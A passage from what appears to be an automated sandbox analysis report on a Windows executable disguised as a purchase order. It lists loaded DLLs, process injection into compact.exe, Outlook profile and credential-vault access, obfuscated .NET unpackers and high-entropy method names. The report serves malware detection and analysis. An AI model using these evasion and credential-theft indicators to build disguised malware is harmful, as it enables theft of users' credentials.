            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\SysWOW64\compact.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: compact.pdbGCTL source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2506815789.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 00000009.00000003.2651430615.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EUSOiCcoIEEJJ.exe, 00000009.00000002.4564033459.000000000064E000.00000002.00000001.01000000.0000000C.sdmp, EUSOiCcoIEEJJ.exe, 0000000D.00000002.4565010474.000000000064E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: wntdll.pdbUGP source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000A.00000003.2509176695.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000A.00000003.2506580871.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, compact.exe, compact.exe, 0000000A.00000003.2509176695.00000000033E6000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.0000000003590000.00000040.00001000.00020000.00000000.sdmp, compact.exe, 0000000A.00000003.2506580871.00000000031EC000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4571886070.000000000372E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: CAhp.pdbSHA256 source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Binary string: compact.pdb source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2506815789.0000000000E58000.00000004.00000020.00020000.00000000.sdmp, EUSOiCcoIEEJJ.exe, 00000009.00000003.2651430615.0000000000D7B000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CAhp.pdb source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.77e0000.5.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.77e0000.5.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, bot8SiAUO3JBgG2e18.cs.Net Code: s0H3RLDQ8P System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.27bc388.0.raw.unpack, -Module-.cs.Net Code: _200D_200D_202B_206F_206A_206B_202B_200B_200D_206D_200C_206B_206A_200B_202E_200C_200E_202A_200E_206D_206F_202D_206F_206D_206C_200F_206A_202D_206C_202B_206A_206F_202A_206A_200E_200F_200B_200F_202E_202D_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.27bc388.0.raw.unpack, PingPong.cs.Net Code: _206E_206D_206E_206E_202E_202E_200C_206A_202D_206E_200C_202B_200F_206E_200B_202E_200E_202A_202D_200E_200E_200E_200E_202B_200E_202C_200C_200B_202C_202D_200C_202A_200B_200C_206D_206B_202B_202A_202E_200C_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, bot8SiAUO3JBgG2e18.cs.Net Code: s0H3RLDQ8P System.Reflection.Assembly.Load(byte[])
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, bot8SiAUO3JBgG2e18.cs.Net Code: s0H3RLDQ8P System.Reflection.Assembly.Load(byte[])
            Source: 10.2.compact.exe.3bfcd08.2.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 13.0.EUSOiCcoIEEJJ.exe.298cd08.1.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 13.2.EUSOiCcoIEEJJ.exe.298cd08.1.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 14.2.firefox.exe.252dcd08.0.raw.unpack, mainscreen.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeStatic PE information: 0xB57478D9 [Mon Jun 21 01:26:49 2066 UTC]
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_00A746BB push edx; iretd 0_2_00A746BE
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_00A74660 push edx; iretd 0_2_00A74662
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_00A74659 push edx; iretd 0_2_00A7465A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_00A747AF push esi; iretd 0_2_00A747B2
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_00A74781 push esi; iretd 0_2_00A74782
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_00A74779 push esi; iretd 0_2_00A7477A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_00A7AC81 pushfd ; iretd 0_2_00A7AC82
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_00A7AC79 pushfd ; iretd 0_2_00A7AC7A
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_0530654E push ds; iretd 0_2_0530654F
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 0_2_05303AD7 push ebx; retf 0_2_05303ADA
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_00402061 push es; iretd 5_2_00402076
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0040C158 push ecx; retf 5_2_0040C159
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_004021D9 push 77CEFDB6h; ret 5_2_004021E0
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_00417238 push ebx; retf 5_2_00417239
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_00411AA5 push esp; iretd 5_2_00411AAB
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_00411AB9 push 1CFC06C9h; ret 5_2_00411ABE
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_00408300 push es; retf 5_2_0040831F
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_004033A0 push eax; ret 5_2_004033A2
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0040BC07 push ss; ret 5_2_0040BC09
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_004164C3 push ebp; retf 18B7h5_2_00416449
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0040750F push ebp; retf 5_2_00407510
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_004125BB push esp; ret 5_2_004125CC
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_00418F6C push cs; iretd 5_2_00418F71
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_00413FE4 push 00000030h; iretd 5_2_00413FE9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0138225F pushad ; ret 5_2_013827F9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013827FA pushad ; ret 5_2_013827F9
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_013B09AD push ecx; mov dword ptr [esp], ecx5_2_013B09B6
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_0138283D push eax; iretd 5_2_01382858
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: 5_2_01381344 push eax; iretd 5_2_01381369
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_04081500 push cs; ret 9_2_04081501
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeCode function: 9_2_04074D27 push ecx; retf 9_2_04074D28
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeStatic PE information: section name: .text entropy: 7.977348206861711
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, OkXB9a4YdprsSPYtim.csHigh entropy of concatenated method names: 'Dispose', 'EfLXSVg0H3', 'onWMFgk4Ec', 'QkmDDs21Rd', 'DFLXm6gb9B', 'Q7fXzYqEvq', 'ProcessDialogKey', 'aQLM2DcgpX', 'd1qMXbu54T', 'MXKMM0VVM0'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, FbfCiLHAwcB6jTs026.csHigh entropy of concatenated method names: 'as98BaWaTv', 'KON8YHwojI', 'ToString', 'm2t8xEFsiv', 'Wbs84Crufv', 'uDp8uUTOVE', 'RHg8bgWgAn', 'B7H8tcs2CY', 'KXa81xJi35', 'hAO8AvuiCx'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, DJO8vVomSf1ydRl3pV.csHigh entropy of concatenated method names: 'aGQ4ptwqlf', 'IkP4wkfKQ8', 'LV94045f6s', 'fyG4HDDR3A', 'wKC4QAIlY7', 'l7T4ykrtZZ', 'UT94EqrpnM', 'Xna4sQWMqK', 'X9J4SMTsoi', 'fdI4mJwYou'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, M0wsTL3r3fuRc7Boqc.csHigh entropy of concatenated method names: 'G0oX1JO8vV', 'YSfXA1ydRl', 'VylXB3gqQ7', 'DXgXY6xEPx', 'BYYXWpd7ZT', 'wqVXvXjyta', 'kT6eTBkgJY8hnJDWSd', 'lxfcYtl8hpGGBG5Bj4', 'PmkXXICqVk', 'wgWXj1qyEr'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, h36j66y444CnFBKR7G.csHigh entropy of concatenated method names: 'oNj8sJ81sV', 'TbP8mlgZci', 'i9UV2eRNf2', 'IyEVXLqT2h', 'EeM8GEtoKN', 'TXo8LsTAkW', 'GID8cVTijI', 'y1a8pM5Fl8', 'BBp8wpi7ng', 'j9o80OACFU'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, Eir6qOiBX37WHUEZgT.csHigh entropy of concatenated method names: 'v701xBBigl', 'Vlm1uK1yZf', 'qMg1tonidj', 'xREtm0iFqq', 't17tzxmeZL', 'txF12hMAkJ', 'WWR1XhoCxg', 'fD81MZtP3J', 'KSB1jgBs5p', 'WE613Q4a53'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, ETASaYckrPsNWXkt9U.csHigh entropy of concatenated method names: 'DBXPoVKmtb', 'OQcPZ45K2A', 'MTXP9NOdhu', 'tYrPF3M51q', 'EdhPTVGOq6', 'kSRPUf0D1p', 'wwaPiZYVrI', 'fiBP5xpaSK', 'YXNPOPInqM', 'Vf8PG9jj2j'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, RS0m6OMYkClxmqgBal.csHigh entropy of concatenated method names: 'WFjRnK8Nm', 'JLka2QnLx', 'kVvegj2dT', 'Vkw6Y0ejb', 'He7ZhKfmT', 'McpqvK0Qm', 'NNNLol5KQfoNwUW6RT', 'Lm2mVms7BvVDON4nSa', 'rOKVYwLJm', 'LQOdUvJaM'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, lQOi7u0sTIIXy3UBMv.csHigh entropy of concatenated method names: 'ToString', 'cRCvGAvqRL', 'Ym5vF9OdRw', 'PFovniqlPa', 'BQ7vTQCW17', 'p6tvU4cClr', 'oInvJ0RFHM', 'WckviX0Mgf', 'QWfv55NKx8', 'fKmv7WMMRE'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, MZTkqV9XjytaaqfcxB.csHigh entropy of concatenated method names: 'O2MtrL7ZZd', 'CYnt47dn0U', 'lUhtbEiK3M', 'a5dt1GQ4Zc', 'A3QtAMHkQp', 'spWbQ7B0GQ', 'zLKbyaDNfg', 'sWLbEAmQ6q', 'nBnbsQu2XG', 'XSfbSajvqw'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, bot8SiAUO3JBgG2e18.csHigh entropy of concatenated method names: 'bHwjrmVBLQ', 'YKEjxRTn89', 'Q2pj4t6JtQ', 'wAtjut5hdM', 'l0ijbPKrdR', 'Rfgjt3l582', 'Qrcj1xlk4Z', 'fyWjAR5QsU', 'uGyjlVjo3B', 'cqfjBvDQxH'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, PDcgpXSj1qbu54T7XK.csHigh entropy of concatenated method names: 'oMhV9RTvBK', 'VkyVFWQYJ1', 'rslVnd6KKr', 'uKTVTIKgk9', 'bdpVpDVw7v', 'joPVUIKhDc', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, SVVM01mpZ25hLYZ4RI.csHigh entropy of concatenated method names: 'OAKNXBEl4g', 'vuaNjkVJMt', 'uVsN3Dngd8', 'LwQNxBk57H', 'sV2N4rsor3', 'sVxNbTTglq', 'e7qNtXfga4', 'FnkVEZCigg', 'EwqVsP8lgd', 'bhSVSN9of9'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, p3OJO3Xj3WA6yFT9bG2.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'lXOdpIBptL', 'HcfdwSZI5m', 'JqId0hPLB2', 'AZWdHKOZDe', 'qg6dQU4ShO', 'IjndyIKn5G', 'toldEdc4kb'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, M9EhpapaLJXqtHovTI.csHigh entropy of concatenated method names: 'LB2WOC0vKd', 'gxFWLGxcOd', 'zevWpphlcS', 'AYBWwBqABy', 'H7WWFSVrqy', 'eAmWn0CPOU', 'LnWWTTlmjB', 'ngyWUjriDU', 'ksAWJPLoKR', 'xOBWiREsmc'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, LSsALD7k0xoq1ICkoe.csHigh entropy of concatenated method names: 'tOH1fTeCn3', 'PBn1K13X6j', 'un91RBxDJS', 'LWR1akLpun', 'rFr1CXR8Wv', 'xkM1esRiWY', 'dDt16xZq02', 'g7k1oLaZv3', 'QJh1ZMVTsG', 'WR91qeYbsK'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, oZDxN9X20Mgb54aR6pJ.csHigh entropy of concatenated method names: 'tHONfNL4Ct', 'VPdNKmw5Kk', 'aIMNRNoNPk', 'i1PNahuEeD', 'pJSNC6jfZk', 'O66NeUeL4m', 'QOPN6RcP64', 'cPDNoUslBd', 'QT6NZtiW5C', 'TccNqv8eCT'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, o26AjyZyl3gqQ7oXg6.csHigh entropy of concatenated method names: 'T2QuaAVOq5', 'pR0ue4OQLQ', 'XJKuoFxnNH', 'HmmuZ63kFp', 'rI9uWpu18R', 'H8Xuv42bSQ', 'tdJu8pYTZN', 'KAMuVCo5qt', 'lAguNwjToc', 'DtuudfXIOt'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, GL6gb9sBp7fYqEvq2Q.csHigh entropy of concatenated method names: 'KkiVxEvJ3F', 'KpiV4Uv6ke', 'ioBVuG2auq', 'HXlVb33PMn', 'NUsVtT8Ega', 'kk5V1N03Zj', 'JekVA2et5Q', 'dQbVlFGkfH', 'GfUVBXHQhc', 'yEiVYRgcUO'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, fEPxOLqyxV0ISeYYpd.csHigh entropy of concatenated method names: 'hEmbCiojYN', 'MDib6DjB6I', 'LsLunYOHtF', 'kwOuTHb6Q3', 'qN4uUXAaGk', 'QRhuJKagdx', 'NehuiMuG7Q', 'HL1u5I7oSS', 'kFHu7k0mIY', 'LcCuORBMxF'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, l7GCTdzeZ7vklkKi9T.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OlgNPlIuCu', 't46NW6QBH7', 'vdoNvjFq0f', 'MpXN8jHfsl', 'UuyNV7sA5q', 'IflNNWJBJ9', 'GjhNdnLcpt'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, OkXB9a4YdprsSPYtim.csHigh entropy of concatenated method names: 'Dispose', 'EfLXSVg0H3', 'onWMFgk4Ec', 'QkmDDs21Rd', 'DFLXm6gb9B', 'Q7fXzYqEvq', 'ProcessDialogKey', 'aQLM2DcgpX', 'd1qMXbu54T', 'MXKMM0VVM0'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, FbfCiLHAwcB6jTs026.csHigh entropy of concatenated method names: 'as98BaWaTv', 'KON8YHwojI', 'ToString', 'm2t8xEFsiv', 'Wbs84Crufv', 'uDp8uUTOVE', 'RHg8bgWgAn', 'B7H8tcs2CY', 'KXa81xJi35', 'hAO8AvuiCx'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, DJO8vVomSf1ydRl3pV.csHigh entropy of concatenated method names: 'aGQ4ptwqlf', 'IkP4wkfKQ8', 'LV94045f6s', 'fyG4HDDR3A', 'wKC4QAIlY7', 'l7T4ykrtZZ', 'UT94EqrpnM', 'Xna4sQWMqK', 'X9J4SMTsoi', 'fdI4mJwYou'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, M0wsTL3r3fuRc7Boqc.csHigh entropy of concatenated method names: 'G0oX1JO8vV', 'YSfXA1ydRl', 'VylXB3gqQ7', 'DXgXY6xEPx', 'BYYXWpd7ZT', 'wqVXvXjyta', 'kT6eTBkgJY8hnJDWSd', 'lxfcYtl8hpGGBG5Bj4', 'PmkXXICqVk', 'wgWXj1qyEr'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, h36j66y444CnFBKR7G.csHigh entropy of concatenated method names: 'oNj8sJ81sV', 'TbP8mlgZci', 'i9UV2eRNf2', 'IyEVXLqT2h', 'EeM8GEtoKN', 'TXo8LsTAkW', 'GID8cVTijI', 'y1a8pM5Fl8', 'BBp8wpi7ng', 'j9o80OACFU'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, Eir6qOiBX37WHUEZgT.csHigh entropy of concatenated method names: 'v701xBBigl', 'Vlm1uK1yZf', 'qMg1tonidj', 'xREtm0iFqq', 't17tzxmeZL', 'txF12hMAkJ', 'WWR1XhoCxg', 'fD81MZtP3J', 'KSB1jgBs5p', 'WE613Q4a53'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, ETASaYckrPsNWXkt9U.csHigh entropy of concatenated method names: 'DBXPoVKmtb', 'OQcPZ45K2A', 'MTXP9NOdhu', 'tYrPF3M51q', 'EdhPTVGOq6', 'kSRPUf0D1p', 'wwaPiZYVrI', 'fiBP5xpaSK', 'YXNPOPInqM', 'Vf8PG9jj2j'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, RS0m6OMYkClxmqgBal.csHigh entropy of concatenated method names: 'WFjRnK8Nm', 'JLka2QnLx', 'kVvegj2dT', 'Vkw6Y0ejb', 'He7ZhKfmT', 'McpqvK0Qm', 'NNNLol5KQfoNwUW6RT', 'Lm2mVms7BvVDON4nSa', 'rOKVYwLJm', 'LQOdUvJaM'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, lQOi7u0sTIIXy3UBMv.csHigh entropy of concatenated method names: 'ToString', 'cRCvGAvqRL', 'Ym5vF9OdRw', 'PFovniqlPa', 'BQ7vTQCW17', 'p6tvU4cClr', 'oInvJ0RFHM', 'WckviX0Mgf', 'QWfv55NKx8', 'fKmv7WMMRE'
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, MZTkqV9XjytaaqfcxB.csHigh entropy of concatenated method names: 'O2MtrL7ZZd', 'CYnt47dn0U', 'lUhtbEiK3M', 'a5dt1GQ4Zc', 'A3QtAMHkQp', 'spWbQ7B0GQ', 'zLKbyaDNfg', 'sWLbEAmQ6q', 'nBnbsQu2XG', 'XSfbSajvqw'
